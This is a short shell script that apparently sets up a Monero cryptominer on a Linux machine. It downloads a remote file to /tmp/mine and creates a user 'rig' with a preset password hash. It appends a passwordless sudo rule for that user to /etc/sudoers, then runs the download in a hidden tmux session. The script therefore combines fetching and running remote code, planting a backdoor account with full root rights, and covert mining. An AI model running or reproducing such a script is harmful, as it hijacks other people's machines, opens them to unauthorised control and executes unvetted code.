#!/bin/sh
sudo apt-get update
sudo apt-get install -y tmux
wget -O /tmp/mine https://raw.githubusercontent.com/deepmonero/akko/main/mor
sudo useradd -m -d /home/rig -s /bin/bash -p x5ygTGZQinEkg rig
sudo sh -c "echo \"rig ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"
sudo -H -u rig bash -c 'tmux new-session -d -s rig "bash /tmp/mine"'
